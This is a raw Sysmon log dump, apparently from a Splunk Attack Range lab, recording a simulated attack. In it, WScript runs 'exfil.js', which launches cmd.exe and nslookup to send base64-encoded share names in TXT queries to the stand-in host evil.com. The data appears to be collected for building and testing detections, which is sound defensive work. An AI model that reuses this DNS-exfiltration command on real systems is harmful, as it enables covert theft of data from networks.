C:\Users\ADMINI~1\AppData\Local\Temp\2\nltojd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.067{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmoi.tmpMD5=3A2317C9FD900A859CF011E0E257F84B,SHA256=3526444D988B70677FDC7B72CFB724A402371630F20BEF65D3F298944DCB36B6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.051{2E1864BB-18FD-629A-0A46-000000005F02}38602652C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-0B46-000000005F02}3724C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.051{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.051{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.051{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.051{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.051{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-0B46-000000005F02}3724C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.051{2E1864BB-18FD-629A-0946-000000005F02}42286576C:\Windows\system32\cmd.exe{2E1864BB-18FD-629A-0B46-000000005F02}3724C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.051{2E1864BB-18FD-629A-0B46-000000005F02}3724C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FD-629A-0946-000000005F02}4228C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmoi.tmp 2>&1 10341000x8000000000000000214799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.020{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-0A46-000000005F02}3860C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.020{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-0A46-000000005F02}3860C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.020{2E1864BB-18FD-629A-0A46-000000005F02}38602652C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-0946-000000005F02}4228C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.004{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-0A46-000000005F02}3860C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.004{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.004{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.004{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.004{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.004{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-0946-000000005F02}4228C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.004{2E1864BB-18E0-629A-6742-000000005F02}39767756C:\Windows\System32\WScript.exe{2E1864BB-18FD-629A-0946-000000005F02}4228C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.009{2E1864BB-18FD-629A-0946-000000005F02}4228C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmoi.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.004{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlpjgx.tmpMD5=74AA98EC4B1C82029578D90E2343E510,SHA256=BCED258190799681E04DEC80A23A2247E8F332523DBBC8B2CBECAB9A40B2F90E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044862Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.987{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-18FC-629A-3207-000000006002}1952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.984{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FE-629A-4F46-000000005F02}6192C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.968{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FE-629A-4F46-000000005F02}6192C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.968{2E1864BB-18FE-629A-4F46-000000005F02}61924288C:\Windows\system32\conhost.exe{2E1864BB-18FE-629A-4E46-000000005F02}5988C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.968{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-4F46-000000005F02}6192C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.953{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.953{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.953{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-4E46-000000005F02}5988C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.953{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.953{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.953{2E1864BB-18E0-629A-6742-000000005F02}39762020C:\Windows\System32\WScript.exe{2E1864BB-18FE-629A-4E46-000000005F02}5988C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 